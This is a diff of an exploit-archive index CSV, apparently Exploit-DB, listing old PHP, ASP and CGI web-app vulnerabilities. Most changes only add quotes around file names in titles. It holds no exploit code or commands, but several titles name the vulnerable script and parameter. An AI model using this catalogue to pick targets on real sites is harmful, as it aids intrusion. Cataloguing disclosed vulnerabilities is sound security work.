 28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
 28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
 28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80
 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0
-28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - Mybic_Server.php Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
+28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
 28687,platforms/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
 28688,platforms/php/webapps/28688.txt,"PHP_news 2.0 - 'admin/news.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
 28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - 'admin/catagory.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
@@ -30632,12 +30636,12 @@ id,file,description,date,author,platform,type,port
 28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0
 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0
 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0
-28728,platforms/php/webapps/28728.txt,"Geotarget - script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0
+28728,platforms/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0
 28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80
 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80
 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 - home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0
 28712,platforms/php/webapps/28712.txt,"CMS Formulasi 2.07 - Multiple Vulnerabilities",2013-10-04,"Sarahma Security",php,webapps,80
-28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - index.php3 Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0
+28714,platforms/php/webapps/28714.txt,"PHPSelect Web Development - 'index.php3' Remote File Inclusion",2006-09-27,rUnViRuS,php,webapps,0
 29274,platforms/php/webapps/29274.html,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1)",2013-10-29,"Marcela Benetrix",php,webapps,80
 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 - PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0
 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0
@@ -30647,7 +30651,7 @@ id,file,description,date,author,platform,type,port
 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - process_login.php Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0
 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80
 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0
-28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - functions.php Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0
+28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0
 28738,platforms/php/webapps/28738.txt,"Digishop 4.0 - cart.php Cross-Site Scripting",2006-10-02,meto5757,php,webapps,0
 28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0
 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0
@@ -30672,7 +30676,7 @@ id,file,description,date,author,platform,type,port
 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0
 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0
 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0
-28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0
+28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - 'functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0
 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0
 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
 28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - 'PHPWS_SOURCE_DIR' Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0
@@ -30680,20 +30684,20 @@ id,file,description,date,author,platform,type,port
 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0
 28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",php,webapps,0
 28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - 'Getimg.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0
-28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
-28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
-28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
+28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
+28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - 'GoogleSearch.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
+28782,platforms/php/webapps/28782.txt,"Tagit2b - 'DelTagUser.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
 28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0
 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 - 'Addnews.php' Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0
-28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0
+28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - 'bug.php' Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0
 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0
 28790,platforms/php/webapps/28790.txt,"phpList 2.x - Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0
-28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0
+28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - 'config.php' Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0
 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0
 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0
 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0
 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - upload.php Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0
-28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0
+28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0
 28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
 28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
 28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
@@ -30701,21 +30705,21 @@ id,file,description,date,author,platform,type,port
 28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
 28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0
-28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - Not_Mem.php Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
+28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 28807,platforms/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0
 28808,platforms/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0
-28814,platforms/php/webapps/28814.txt,"RamaCMS - ADODB.Inc.php Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0
-28815,platforms/php/webapps/28815.txt,"H-Sphere Webshell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0
-28818,platforms/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0
-28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0
+28814,platforms/php/webapps/28814.txt,"RamaCMS - 'ADODB.Inc.php' Remote File Inclusion",2006-10-13,"Le CoPrA",php,webapps,0
+28815,platforms/php/webapps/28815.txt,"H-Sphere WebShell 2.x - 'login.php' Cross-Site Scripting",2006-10-14,b0rizQ,php,webapps,0
+28818,platforms/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - 'HTMLTemplate.php' Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0
+28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 - 'Calcul-page.php' Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0
 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0
-28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0
+28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion",2006-10-16,ERNE,php,webapps,0
 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 - Edit User HTML Injection",2006-10-16,MP,php,webapps,0
 28824,platforms/php/webapps/28824.txt,"phpList 2.10.2 - 'index.php' Cross-Site Scripting",2006-10-17,b0rizQ,php,webapps,0
 28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 - 'index.php' Cross-Site Scripting",2006-10-17,CorryL,php,webapps,0
 28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 - Rpc.php Unauthorized Access",2006-10-18,jonepet,php,webapps,0
 28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Inclusion",2006-10-18,Matdhule,php,webapps,0
-28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - DBProperty.php Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0
+28828,platforms/php/webapps/28828.txt,"Zorum 3.5 - 'DBProperty.php' Remote File Inclusion",2006-10-19,MoHaNdKo,php,webapps,0
 28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System - index.asp SQL Injection",2006-10-18,fireboy,asp,webapps,0
 28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 - 'index.php' Remote File Inclusion",2006-10-19,"Alireza Ahari",php,webapps,0
 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0
@@ -30735,13 +30739,13 @@ id,file,description,date,author,platform,type,port
 28858,platforms/php/webapps/28858.txt,"Simpnews 2.x - 'index.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x - 'pwlost.php' Cross-Site Scripting",2006-10-24,security@vigilon.com,php,webapps,0
 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
-28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
+28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
 28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
 28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0
-28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0
+28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0
 28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 - Change_Pass.php Cross-Site Scripting",2006-10-30,SnipEr.X,php,webapps,0
 28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 - dir.php Directory Traversal",2006-10-27,Christopher,php,webapps,0
-28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - Bannieres.php Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0
+28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion",2006-10-27,Mahmood_ali,php,webapps,0
 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x - search.asp SQL Injection",2006-10-28,almaster,asp,webapps,0
 28870,platforms/php/webapps/28870.txt,"PunBB 1.x - SQL Injection",2006-10-30,nmsh_sa,php,webapps,0
 28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 - db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
@@ -30755,15 +30759,15 @@ id,file,description,date,author,platform,type,port
 28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 - Htmlarea.php Cross-Site Scripting",2005-10-30,Vigilon,php,webapps,0
 28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Inclusion",2006-10-31,MEFISTO,php,webapps,0
 28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module - search.php SQL Injection",2006-10-31,Paisterist,php,webapps,0
-28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
+28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
 28889,platforms/php/webapps/28889.txt,"Netquery 4.0 - NQUser.php Cross-Site Scripting",2006-10-31,"Tal Argoni",php,webapps,0
 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server - Messenger Express Expression() HTML Injection",2006-10-31,LegendaryZion,php,webapps,0
 28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail - 'Expression()' HTML Injection",2006-10-31,LegendaryZion,php,webapps,0
 28892,platforms/php/webapps/28892.txt,"RSSonate - Project_Root Parameter Remote File Inclusion",2006-11-01,Arab4services,php,webapps,0
-28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion",2006-11-08,igi,php,webapps,0
+28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion",2006-11-08,igi,php,webapps,0
 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x - Avatar Arbitrary File Upload",2006-11-02,securfrog,php,webapps,0
 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 - 'index.php' SQL Injection",2006-11-02,Spiked,php,webapps,0
-28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion",2006-11-07,navairum,php,webapps,0
+28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion",2006-11-07,navairum,php,webapps,0
 28900,platforms/php/webapps/28900.txt,"ac4p Mobile - 'index.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28901,platforms/php/webapps/28901.txt,"ac4p Mobile - 'MobileNews.php' Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28902,platforms/php/webapps/28902.txt,"ac4p Mobile - 'polls.php' Multiple Parameter Cross-Site Scripting (1)",2006-11-03,AL-garnei,php,webapps,0
@@ -30772,10 +30776,10 @@ id,file,description,date,author,platform,type,port
 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0
 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0
-28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0
+28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0
 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0
 28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 - popup.php SQL Injection",2006-11-04,x23,php,webapps,0
-28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - Install.php3 Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0
+28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 - 'Install.php3' Remote File Inclusion",2006-11-06,Mahmood_ali,php,webapps,0
 28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 - NewList.php Cross-Site Scripting",2006-11-06,CvIr.System,php,webapps,0
 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0
 28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0
@@ -30800,7 +30804,7 @@ id,file,description,date,author,platform,type,port
 28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
 28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0
 28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 - 'index.php' Cross-Site Scripting",2006-11-07,Dr.HAiL,php,webapps,0
-28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion",2006-11-08,ajann,php,webapps,0
+28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion",2006-11-08,ajann,php,webapps,0
 28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 - Logon.aspx Cross-Site Scripting",2006-11-08,"Gemma Hughes",asp,webapps,0
 28942,platforms/php/webapps/28942.txt,"FreeWebShop 2.1/2.2 - 'index.php' page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0
 28943,platforms/php/webapps/28943.txt,"FreeWebShop 2.1/2.2 - 'index.php' cat Parameter Cross-Site Scripting",2006-11-08,"laurent gaffie",php,webapps,0
@@ -30849,7 +30853,7 @@ id,file,description,date,author,platform,type,port
 29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 - viewlinks.asp categoryId Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0
 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0
 29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - addlisting.asp cat Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0
-28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - Debug_test.php Remote File Inclusion",2006-11-12,Firewall,php,webapps,0
+28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion",2006-11-12,Firewall,php,webapps,0
 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
 29001,platforms/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
@@ -31060,7 +31064,7 @@ id,file,description,date,author,platform,type,port
 29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - form.php Multiple Parameter Cross-Site Scripting",2006-12-14,Mr_KaLiMaN,php,webapps,0
 29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - mod/forum/discuss.php navtail Parameter Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0
 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0
-29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion",2006-12-16,Kacper,php,webapps,0
+29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,php,webapps,0
 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.asp SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0
 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - Shout.php HTML Injection",2006-12-18,IMHOT3B,php,webapps,0
 29298,platforms/php/webapps/29298.txt,"osTicket 1.2/1.3 Support Cards - view.php Cross-Site Scripting",2006-12-19,"Hacker CooL",php,webapps,0
@@ -31176,8 +31180,8 @@ id,file,description,date,author,platform,type,port
 29433,platforms/php/webapps/29433.txt,"Magic Photo Storage Website - user/user_extend.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
 29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",multiple,webapps,0
-29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - info.php Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0
-29438,platforms/php/webapps/29438.txt,"Edit-X - Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
+29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0
+29438,platforms/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0
 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0
 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0
@@ -31263,10 +31267,10 @@ id,file,description,date,author,platform,type,port
 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps,0
 36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80
 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0
-29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0
+29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion",2007-01-31,trzindan,php,webapps,0
 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0
 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0
-29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - Lang.php Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0
+29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0
 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps,0
 29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - 'mod_news/index.php' chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0
 29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - mod_news/goodies.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0
@@ -31275,7 +31279,7 @@ id,file,description,date,author,platform,type,port
 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0
 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0
 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusion",2007-02-05,anonymous,php,webapps,0
